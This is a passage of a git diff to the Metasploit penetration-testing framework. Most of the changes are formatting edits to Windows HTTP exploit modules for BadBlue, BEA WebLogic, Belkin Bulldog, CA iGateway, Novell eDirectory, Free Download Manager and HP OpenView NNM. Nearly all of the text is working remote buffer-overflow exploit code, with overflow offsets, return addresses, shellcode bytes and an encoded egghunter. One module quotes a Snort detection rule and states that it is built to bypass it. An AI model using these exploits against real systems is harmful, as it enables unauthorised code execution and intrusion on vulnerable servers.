2] = "\xeb\xf9" sploit[seh_offset , 4] = [ target.ret ].pack('V') } - + print_status("Trying target #{target.name}...") sock.put(uri_start + sploit + uri_end) resp = sock.get_once if (resp and (m = resp.match(/(.*)<\/title>/i))) print_status("The exploit failed : HTTP Status Code '#{m[1]}' received :-(") - end + end handler disconnect diff --git a/modules/exploits/windows/http/badblue_ext_overflow.rb b/modules/exploits/windows/http/badblue_ext_overflow.rb index e77f2c238e..8f6b2bff51 100644 --- a/modules/exploits/windows/http/badblue_ext_overflow.rb +++ b/modules/exploits/windows/http/badblue_ext_overflow.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking @@ -20,7 +18,7 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Seh def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'BadBlue 2.5 EXT.dll Buffer Overflow', 'Description' => %q{ This is a stack overflow exploit for BadBlue version 2.5. @@ -46,41 +44,44 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ - ['BadBlue 2.5 (Universal)', { 'Ret' => 0x1003d9da }], + ['BadBlue 2.5 (Universal)', { 'Ret' => 0x1003d9da }], ], 'DisclosureDate' => 'Apr 20 2003', 'DefaultTarget' => 0)) - - register_options( [ Opt::RPORT(80) ], self.class ) + + register_options( + [ + Opt::RPORT(80) + ], self.class ) end def check connect - + sock.put("GET / HTTP/1.0\r\n\r\n") resp = sock.get_once disconnect - - if (resp =~ /BadBlue\/2.5/) - return Exploit::CheckCode::Vulnerable - end - return Exploit::CheckCode::Safe + + if (resp =~ /BadBlue\/2.5/) + return Exploit::CheckCode::Vulnerable + end + return Exploit::CheckCode::Safe end def exploit connect - uri = "GET /ext.dll?mfcisapicommand=" - sploit = rand_text_alphanumeric(500) + uri = "GET /ext.dll?mfcisapicommand=" + sploit = rand_text_alphanumeric(500) seh = generate_seh_payload(target.ret) sploit[492, seh.length] = seh print_status("Trying target #{target.name}...") sock.put(uri + sploit + "\r\n\r\n") - + handler disconnect end diff --git a/modules/exploits/windows/http/badblue_passthru.rb b/modules/exploits/windows/http/badblue_passthru.rb index 8c541343d2..feb0773cdd 100644 --- a/modules/exploits/windows/http/badblue_passthru.rb +++ b/modules/exploits/windows/http/badblue_passthru.rb @@ -3,27 +3,25 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'BadBlue 2.72b PassThru Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in the PassThru - functionality in ext.dll in BadBlue 2.72b and earlier. + functionality in ext.dll in BadBlue 2.72b and earlier. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, @@ -48,23 +46,25 @@ class Metasploit3 < Msf::Exploit::Remote 'DisableNops' => 'True', }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'BadBlue 2.72b Universal', { 'Ret' => 0x1003f2f3 } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Dec 10 2007')) - - register_options( [Opt::RPORT(80),], self.class ) + register_options( + [ + Opt::RPORT(80) + ], self.class) end def exploit # Need to obfuscate the buffer a bit more. "\x96" is ghetto. - uri = "/ext.dll?mfcisapicommand=PassThru&" + "\x96" * (4116 - payload.encoded.length) - uri << payload.encoded + Rex::Arch::X86.jmp_short(8) + make_nops(2) + [target.ret].pack('V') - uri << make_nops(12) + [0xe8, -850].pack('CV') - + uri = "/ext.dll?mfcisapicommand=PassThru&" + "\x96" * (4116 - payload.encoded.length) + uri << payload.encoded + Rex::Arch::X86.jmp_short(8) + make_nops(2) + [target.ret].pack('V') + uri << make_nops(12) + [0xe8, -850].pack('CV') + print_status("Trying target %s..." % target.name) send_request_raw({'uri' => uri,}, 5) diff --git a/modules/exploits/windows/http/bea_weblogic_jsessionid.rb b/modules/exploits/windows/http/bea_weblogic_jsessionid.rb index 77aeb72e5f..7e5b58dbbb 100644 --- a/modules/exploits/windows/http/bea_weblogic_jsessionid.rb +++ b/modules/exploits/windows/http/bea_weblogic_jsessionid.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -9,17 +13,17 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking - - include Msf::Exploit::Remote::Tcp - include Msf::Exploit::Remote::Seh + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Remote::Seh def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'BEA WebLogic JSESSIONID Cookie Value Overflow', 'Description' => %q{ - This module exploits a buffer overflow in BEA's WebLogic plugin. The vulnerable - code is only accessible when clustering is configured. A request containing a - long JSESSION cookie value can lead to arbirtary code execution. + This module exploits a buffer overflow in BEA\'s WebLogic plugin. The vulnerable + code is only accessible when clustering is configured. A request containing a + long JSESSION cookie value can lead to arbirtary code execution. }, 'Author' => 'pusscat', 'References' => @@ -37,24 +41,27 @@ class Metasploit3 < Msf::Exploit::Remote { 'Space' => 800, 'BadChars' => "\x00\x0d\x0a\x20\x3B\x3D\x2C", - 'StackAdjustment' => -3500, - + 'StackAdjustment' => -3500, }, - 'Targets' => - [ - [ 'Windows Apache 2.2 - WebLogic module version 1.0.1136334', - { - 'Ret' => 0x1006c9b5, # jmp esp - } + 'Targets' => + [ + [ 'Windows Apache 2.2 - WebLogic module version 1.0.1136334', + { + 'Ret' => 0x1006c9b5, # jmp esp + } + ], + [ 'Windows Apache 2.2 - WebLogic module version 1.0.1150354', + { + 'Ret' => 0x1006c9be, # jmp esp + } + ], ], - [ 'Windows Apache 2.2 - WebLogic module version 1.0.1150354', - { - 'Ret' => 0x1006c9be, # jmp esp - } - ], - ], 'DefaultTarget' => 1)) - register_options( [ Opt::RPORT(80) ], self.class ) + + register_options( + [ + Opt::RPORT(80) + ], self.class ) end def exploit @@ -62,9 +69,9 @@ class Metasploit3 < Msf::Exploit::Remote sploit[8181, 4] = [target.ret].pack('V') sploit[8185, payload.encoded.length] = payload.encoded - request = + request = "POST /index.jsp HTTP/1.1\r\nHost: localhost\r\nCookie: TAGLINE=IAMMCLOVIN; JSESSIONID=" + - sploit + + sploit + "\r\n\r\n" connect @@ -75,4 +82,4 @@ class Metasploit3 < Msf::Exploit::Remote end end - + diff --git a/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb b/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb index 7ee0910ea0..56ad5f02f4 100644 --- a/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb +++ b/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -9,19 +13,19 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking - - include Msf::Exploit::Remote::Tcp - include Msf::Exploit::Remote::Seh + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Remote::Seh def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'BEA Weblogic Transfer-Encoding Buffer Overflow', 'Description' => %q{ - This module exploits a stack based buffer overflow in the BEA - Weblogic Apache plugin. This vulnerability exists in the - error reporting for unknown Transfer-Encoding headers. - You may have to run this twice due to timing issues with handlers. - }, + This module exploits a stack based buffer overflow in the BEA + Weblogic Apache plugin. This vulnerability exists in the + error reporting for unknown Transfer-Encoding headers. + You may have to run this twice due to timing issues with handlers. + }, 'Author' => 'pusscat', 'References' => [ @@ -30,20 +34,19 @@ class Metasploit3 < Msf::Exploit::Remote [ 'URL', 'http://support.bea.com/application_content/product_portlets/securityadvisories/2806.html'], ], - 'DefaultOptions' => - { - 'EXITFUNC' => 'seh', - }, + 'DefaultOptions' => + { + 'EXITFUNC' => 'seh', + }, 'Privileged' => true, 'Platform' => 'win', 'Payload' => { 'Space' => 500, 'BadChars' => "\x00\x0d\x0a", - 'StackAdjustment' => -1500, - + 'StackAdjustment' => -1500, }, - 'Targets' => + 'Targets' => [ [ 'Windows Apache 2.2 version Universal', { @@ -53,26 +56,30 @@ class Metasploit3 < Msf::Exploit::Remote ], 'DisclosureDate' => 'Sept 09 2008', 'DefaultTarget' => 0)) - register_options( [ Opt::RPORT(80) ], self.class ) + + register_options( + [ + Opt::RPORT(80) + ], self.class ) end def exploit - sploit = Rex::Text.rand_text_alphanumeric(5800, payload_badchars) - sploit[5781, 8] = "\xeb\x06MC" + [target.ret].pack('V') - sploit[5789, 5] = "\xe9\x5e\xe9\xff\xff" - sploit[0, payload.encoded.length+7] = make_nops(7) + payload.encoded - request = - "POST /index.jsp HTTP/1.1\r\nHost: localhost\r\nTransfer-Encoding: " + - sploit + - "\r\n\r\n" - - handler - connect - sock.put(request); + sploit = Rex::Text.rand_text_alphanumeric(5800, payload_badchars) + sploit[5781, 8] = "\xeb\x06MC" + [target.ret].pack('V') + sploit[5789, 5] = "\xe9\x5e\xe9\xff\xff" + sploit[0, payload.encoded.length+7] = make_nops(7) + payload.encoded - disconnect + request = + "POST /index.jsp HTTP/1.1\r\nHost: localhost\r\nTransfer-Encoding: " + + sploit + + "\r\n\r\n" + + handler + connect + sock.put(request); + + disconnect end end - diff --git a/modules/exploits/windows/http/belkin_bulldog.rb b/modules/exploits/windows/http/belkin_bulldog.rb index a851f9baab..1d290d3540 100644 --- a/modules/exploits/windows/http/belkin_bulldog.rb +++ b/modules/exploits/windows/http/belkin_bulldog.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -17,7 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Belkin Bulldog Plus Web Service Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in Belkin Bulldog Plus @@ -46,15 +46,14 @@ class Metasploit3 < Msf::Exploit::Remote 'DisableNops' => 'True', }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'Windows XP SP3 English', { 'Ret' => 0x7e4456f7 } ], ], - 'DefaultTarget' => 0, + 'DefaultTarget' => 0, 'DisclosureDate' => 'Mar 8 2009')) - - register_options( [ Opt::RPORT(80) ], self.class ) + register_options( [ Opt::RPORT(80) ], self.class ) end def exploit @@ -77,5 +76,5 @@ class Metasploit3 < Msf::Exploit::Remote }, 5) handler - end + end end diff --git a/modules/exploits/windows/http/ca_igateway_debug.rb b/modules/exploits/windows/http/ca_igateway_debug.rb index e3c14774b0..6464126108 100644 --- a/modules/exploits/windows/http/ca_igateway_debug.rb +++ b/modules/exploits/windows/http/ca_igateway_debug.rb @@ -9,8 +9,6 @@ # http://metasploit.com/framework/ ## - - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking @@ -21,7 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'CA iTechnology iGateway Debug Mode Buffer Overflow', 'Description' => %q{ - This module exploits a vulnerability in the Computer Associates + This module exploits a vulnerability in the Computer Associates iTechnology iGateway component. When <Debug>True</Debug> is enabled in igateway.conf (non-default), it is possible to overwrite the stack and execute code remotely. This module works best with Ordinal payloads. @@ -46,7 +44,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Space' => 1024, 'BadChars' => "\x00\x0a\x0d\x20", 'StackAdjustment' => -3500, - 'Compat' => + 'Compat' => { 'ConnectionType' => '+ws2ord', }, @@ -66,28 +64,28 @@ class Metasploit3 < Msf::Exploit::Remote ], self.class) end - def check - connect - sock.put("HEAD / HTTP/1.0\r\n\r\n\r\n") - banner = sock.get(-1,3) + def check + connect + sock.put("HEAD / HTTP/1.0\r\n\r\n\r\n") + banner = sock.get(-1,3) - if (banner =~ /GET and POST methods are the only methods supported at this time/) # Unique? - return Exploit::CheckCode::Detected - end - return Exploit::CheckCode::Safe - end - - def exploit - connect - - seh = generate_seh_payload(target.ret) - buffer = Rex::Text.rand_text_alphanumeric(5000) - buffer[1082, seh.length] = seh - sploit = "GET /" + buffer + " HTTP/1.0" - - sock.put(sploit + "\r\n\r\n\r\n") - - disconnect - handler + if (banner =~ /GET and POST methods are the only methods supported at this time/) # Unique? + return Exploit::CheckCode::Detected end + return Exploit::CheckCode::Safe end + + def exploit + connect + + seh = generate_seh_payload(target.ret) + buffer = Rex::Text.rand_text_alphanumeric(5000) + buffer[1082, seh.length] = seh + sploit = "GET /" + buffer + " HTTP/1.0" + + sock.put(sploit + "\r\n\r\n\r\n") + + disconnect + handler + end +end diff --git a/modules/exploits/windows/http/edirectory_host.rb b/modules/exploits/windows/http/edirectory_host.rb index e34e664b33..33ce8cfbe3 100644 --- a/modules/exploits/windows/http/edirectory_host.rb +++ b/modules/exploits/windows/http/edirectory_host.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking @@ -23,16 +21,16 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Novell eDirectory NDS Server Host Header Overflow', 'Description' => %q{ - This module exploits a stack overflow in Novell eDirectory 8.8.1. - The web interface does not validate the length of the - HTTP Host header prior to using the value of that header in an + This module exploits a stack overflow in Novell eDirectory 8.8.1. + The web interface does not validate the length of the + HTTP Host header prior to using the value of that header in an HTTP redirect. }, 'Author' => 'MC', 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ ['CVE', '2006-5478'], ['OSVDB', '29993'], ['BID', '20655'], @@ -50,24 +48,21 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'Novell eDirectory 8.8.1', { 'Ret' => 0x10085bee } ], # ntls.dll + [ 'Novell eDirectory 8.8.1', { 'Ret' => 0x10085bee } ], # ntls.dll ], - 'Privileged' => true, - 'DisclosureDate' => 'Oct 21 2006', - 'DefaultTarget' => 0)) - register_options([Opt::RPORT(8028)], self.class) + register_options([Opt::RPORT(8028)], self.class) end def exploit connect - sploit = "GET /nds HTTP/1.1" + "\r\n" - sploit << "Host: " + rand_text_alphanumeric(9, payload_badchars) - sploit << "," + rand_text_alphanumeric(719, payload_badchars) + sploit = "GET /nds HTTP/1.1" + "\r\n" + sploit << "Host: " + rand_text_alphanumeric(9, payload_badchars) + sploit << "," + rand_text_alphanumeric(719, payload_badchars) seh = generate_seh_payload(target.ret) sploit[705, seh.length] = seh sploit << "\r\n\r\n" @@ -75,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Trying target #{target.name}...") sock.put(sploit) - + handler disconnect end diff --git a/modules/exploits/windows/http/edirectory_imonitor.rb b/modules/exploits/windows/http/edirectory_imonitor.rb index 2476b5dc4a..35e9c7ac83 100644 --- a/modules/exploits/windows/http/edirectory_imonitor.rb +++ b/modules/exploits/windows/http/edirectory_imonitor.rb @@ -3,29 +3,26 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'eDirectory 8.7.3 iMonitor Remote Stack Overflow', 'Description' => %q{ - This module exploits a stack overflow in eDirectory 8.7.3 + This module exploits a stack overflow in eDirectory 8.7.3 iMonitor service. This vulnerability was discovered by Peter Winter-Smith of NGSSoftware. - }, 'Author' => [ 'anonymous', 'Matt Olney <scacynwrig@yahoo.com>' ], 'License' => BSD_LICENSE, @@ -35,7 +32,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'CVE', '2005-2551'], [ 'OSVDB', '18703'], [ 'BID', '14548'], - ], 'Privileged' => true, 'DefaultOptions' => @@ -49,31 +45,30 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'Windows (ALL) - eDirectory 8.7.3 iMonitor', { 'Ret' => 0x63501f15 } ], # pop/pop/ret ], 'DisclosureDate' => 'Aug 11 2005', 'DefaultTarget' => 0)) - register_options( - [ - Opt::RPORT(8008) - ], self.class) - + register_options( + [ + Opt::RPORT(8008) + ], self.class) end def exploit c = connect - + # pop/pop/ret in ndsimon.dlm on our jump to our shellcode uri = '/nds/' + payload.encoded + make_nops(2) + "\xeb\x04" + [target.ret].pack('V') uri << "\xe9\xbd\xef\xff\xff" uri << "B" * 0xD0 - + res = c.send_request(c.request_raw({ 'uri' => uri })) sleep(4) - + handler disconnect end diff --git a/modules/exploits/windows/http/fdm_auth_header.rb b/modules/exploits/windows/http/fdm_auth_header.rb index 58e3af1982..f74d14eaf8 100644 --- a/modules/exploits/windows/http/fdm_auth_header.rb +++ b/modules/exploits/windows/http/fdm_auth_header.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -13,13 +17,13 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Free Download Manager Remote Control Server Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in Free Download Manager - Remote Control 2.5 Build 758. When sending a specially crafted - Authorization header, an attacker may be able to execute - arbitrary code. + Remote Control 2.5 Build 758. When sending a specially crafted + Authorization header, an attacker may be able to execute + arbitrary code. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, @@ -41,10 +45,10 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Privileged' => true, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'Free Download Manager 2.5 Build 758', { 'Ret' => 0x0040ae0f } ], # fdmwi.exe - ], + ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Feb 2 2009')) end diff --git a/modules/exploits/windows/http/hp_nnm_openview5.rb b/modules/exploits/windows/http/hp_nnm_openview5.rb index b0e232d41d..07433cd6df 100644 --- a/modules/exploits/windows/http/hp_nnm_openview5.rb +++ b/modules/exploits/windows/http/hp_nnm_openview5.rb @@ -3,28 +3,26 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'HP OpenView Network Node Manager OpenView5.exe CGI Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in HP OpenView Network Node Manager 7.50. - By sending a specially crafted CGI request, an attacker may be able to execute - arbitrary code. + By sending a specially crafted CGI request, an attacker may be able to execute + arbitrary code. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, @@ -47,26 +45,25 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ - [ 'HP OpenView Network Node Manager 7.50 / Windows 2000 All', { 'Ret' => 0x5a01d78d } ], # ov.dll + [ 'HP OpenView Network Node Manager 7.50 / Windows 2000 All', { 'Ret' => 0x5a01d78d } ], # ov.dll ], - 'DefaultTarget' => 0, + 'DefaultTarget' => 0, 'DisclosureDate' => 'Dec 6 2007')) - - register_options( [ Opt::RPORT(80) ], self.class ) + register_options( [ Opt::RPORT(80) ], self.class ) end def exploit connect sploit = "GET /OvCgi/OpenView5.exe?Context=Snmp&Action=" + rand_text_alpha_upper(5123) - sploit << [target.ret].pack('V') + payload.encoded - + sploit << [target.ret].pack('V') + payload.encoded + print_status("Trying target %s..." % target.name) sock.put(sploit + "\r\n\r\n") - + handler disconnect end diff --git a/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb b/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb index 96ed4d2621..4ff8585b98 100644 --- a/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb +++ b/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/projects/Framework/ @@ -12,13 +12,12 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = GreatRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'HP OpenView Network Node Manager ovalarm.exe CGI Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in HP OpenView Network Node Manager 7.53. @@ -65,16 +64,15 @@ class Metasploit3 < Msf::Exploit::Remote }, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'HP OpenView Network Node Manager 7.53', { 'Ret' => 0x5a212a4a } ], # jmp esp in ov.dll [ 'HP OpenView Network Node Manager 7.53 (Windows 2003)', { 'Ret' => 0x71c02b67 } ] # push esp / ret in ws2_32.dll ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Dec 9 2009')) - - register_options( [ Opt::RPORT(80) ], self.class ) + register_options( [ Opt::RPORT(80) ], self.class ) end def exploit diff --git a/modules/exploits/windows/http/hp_nnm_ovas.rb b/modules/exploits/windows/http/hp_nnm_ovas.rb index 6d028703e6..0e10eaab89 100644 --- a/modules/exploits/windows/http/hp_nnm_ovas.rb +++ b/modules/exploits/windows/http/hp_nnm_ovas.rb @@ -1,11 +1,14 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - ## # This should bypass the following snort rule referenced from web-misc.rules (10/17/2008) # alert tcp $EXTERNAL_NET any -> $HOME_NET 7510 (msg:"WEB-MISC HP OpenView Network Node Manager HTTP handling buffer overflow attempt"; flow:to_server,established; content:"GET "; depth:4; nocase; isdataat:165,relative; content:"/topology/homeBaseView"; pcre:"/GET\s+\w[^\x0a\x20]{165}/i"; metadata:policy balanced-ips drop, policy security-ips drop; reference:bugtraq,28569; reference:cve,2008-1697; classtype:attempted-admin; sid:13715; rev:3;) @@ -19,7 +22,7 @@ class Metasploit3 < Msf::Exploit::Remote # =( need more targets and perhaps more OS specific return values OS specific would be preferred include Msf::Exploit::Remote::HttpClient - + def initialize(info = {}) super(update_info(info, 'Name' => 'HP OpenView NNM 7.53, 7.51 OVAS.EXE Pre-Authentication SEH Overflow', @@ -30,18 +33,18 @@ class Metasploit3 < Msf::Exploit::Remote Exploitation is tricky due to character restrictions. It was necessary to utilize a egghunter shellcode which was alphanumeric encoded by muts in the original exploit. - + If you plan on using exploit this for a remote shell, you will likely want to migrate to a different process as soon as possible. Any connections get reset after a short period of time. This is probably some timeout handling code that causes this. }, 'Author' => [ - 'bannedit', + 'bannedit', # muts wrote the original exploit and did most of the initial work # credit where credit is due. =) 'muts' - ], + ], 'Version' => '$Revision$', 'References' => @@ -57,7 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote 'InitialAutoRunScript' => 'migrate -f', }, 'Payload' => - { + { 'Space' => 1000, 'BadChars' => "\x0a\x0d\x00", 'StackAdjustment' => -3500, @@ -72,13 +75,13 @@ class Metasploit3 < Msf::Exploit::Remote 'auto' => true } ], - - [ 'Windows 2003/zip.dll OpenView 7.53', + + [ 'Windows 2003/zip.dll OpenView 7.53', { 'Ret' => 0x6d633757 # pop pop ret } ], - + [ 'Windows 2000/jvm.dll OpenView NNM 7.51', { 'Ret' => 0x6d356c6e # pop pop ret @@ -87,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Apr 02 2008')) - + register_options( [ Opt::RPORT(7510), @@ -96,10 +99,10 @@ class Metasploit3 < Msf::Exploit::Remote end - def exploit + def exploit targ = target - + if (target['auto']) print_status("Detecting the remote version...") resp = send_request_raw({'uri' => '/topology/home'}, 5) @@ -116,20 +119,20 @@ class Metasploit3 < Msf::Exploit::Remote else raise RuntimeError, "Unable to determine a target automatically..." # if snmp is running you could set the target based on community strings - + end end print_status("Using target: #{targ.name}") - exploit_target(targ) + exploit_target(targ) end - - + + def exploit_target(targ) # we have to use an egghunter in this case because of the restrictions # on the characters we can use. # we are using skape's egghunter alpha numeric encoded by muts - egghunter = + egghunter = '%JMNU%521*TX-1MUU-1KUU-5QUUP\AA%J'+ 'MNU%521*-!UUU-!TUU-IoUmPAA%JMNU%5'+ '21*-q!au-q!au-oGSePAA%JMNU%521*-D'+ @@ -138,9 +141,9 @@ class Metasploit3 < Msf::Exploit::Remote 'TC1PAA%JMNU%521*-E1wE-E1GE-tEtFPA'+ 'A%JMNU%521*-R222-1111-nZJ2PAA%JMN'+ 'U%521*-1-wD-1-wD-8$GwP' - + print_status("Constructing the malformed http request") - + buf = "http://" buf << "\xeb" * 1101 # this gets mangled in such a way we can use less input buf << "\x41" * 4 # sometimes less really is more @@ -150,10 +153,10 @@ class Metasploit3 < Msf::Exploit::Remote buf << egghunter buf << "\x41" * 100 buf << ":#{datastore['RPORT']}" - + # T00W is the egg payload_buf = "T00WT00W" + make_nops(34) + "\x83\xc4\x03" + payload.encoded - + begin connect resp = send_request_raw({ @@ -171,18 +174,18 @@ class Metasploit3 < Msf::Exploit::Remote # do nothing let the exploit live this catches the # connection reset by peer error which is expected end - + if not resp.nil? raise RuntimeError, "The server responded, that wasn't supposed to happen!" end - + print_status("Malformed http request sent.") print_status("Now we wait for the egg hunter to work it's magic. thx skape!") handler disconnect end - - + + def check resp = send_request_raw({'uri' => '/topology/home'}, 5) diff --git a/modules/exploits/windows/http/hp_nnm_ovwebhelp.rb b/modules/exploits/windows/http/hp_nnm_ovwebhelp.rb index c8f0e39c13..c755d445db 100644 --- a/modules/exploits/windows/http/hp_nnm_ovwebhelp.rb +++ b/modules/exploits/windows/http/hp_nnm_ovwebhelp.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/projects/Framework/ @@ -8,18 +12,17 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = GreatRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'HP OpenView Network Node Manager OvWebHelp.exe CGI Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in HP OpenView Network Node Manager 7.50. - By sending a specially crafted CGI request to OvWebHelp.exe, an attacker may be able to execute - arbitrary code. + By sending a specially crafted CGI request to OvWebHelp.exe, an attacker may be able to execute + arbitrary code. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, @@ -42,15 +45,14 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ - [ 'HP OpenView Network Node Manager 7.50', { 'Ret' => 0x5a01d78d } ], # ov.dll + [ 'HP OpenView Network Node Manager 7.50', { 'Ret' => 0x5a01d78d } ], # ov.dll ], - 'DefaultTarget' => 0, + 'DefaultTarget' => 0, 'DisclosureDate' => 'Dec 9 2009')) - - register_options( [ Opt::RPORT(80) ], self.class ) + register_options( [ Opt::RPORT(80) ], self.class ) end def exploit @@ -64,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote 'method' => "POST", 'data' => "Topic=#{sploit}", }, 3) - + handler end diff --git a/modules/exploits/windows/http/hp_nnm_snmp.rb b/modules/exploits/windows/http/hp_nnm_snmp.rb index 476c42a133..0904719131 100644 --- a/modules/exploits/windows/http/hp_nnm_snmp.rb +++ b/modules/exploits/windows/http/hp_nnm_snmp.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/projects/Framework/ @@ -14,7 +18,7 @@ class Metasploit3 < Msf::Exploit::Remote include 